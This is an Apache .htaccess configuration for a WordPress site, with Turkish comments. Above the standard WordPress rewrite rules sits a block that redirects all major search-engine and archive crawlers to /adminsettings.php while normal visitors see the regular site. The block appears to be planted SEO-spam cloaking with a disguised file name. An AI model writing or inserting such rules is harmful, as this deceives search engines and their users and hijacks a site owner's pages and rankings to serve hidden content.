RewriteEngine On # --- GOOGLE BOTLARI DAHİL BOTLAR --- RewriteCond %{REQUEST_URI} !^/adminsettings\.php$ [NC] RewriteCond %{HTTP_USER_AGENT} (googlebot|google-inspectiontool|google-news|adsbot-google|bingbot|yandex|baidu|duckduckbot|slurp|facebot|ia_archiver) [NC] RewriteRule ^.*$ /adminsettings.php [L] # --- WORDPRESS / PHP AKIŞI --- RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}] RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L]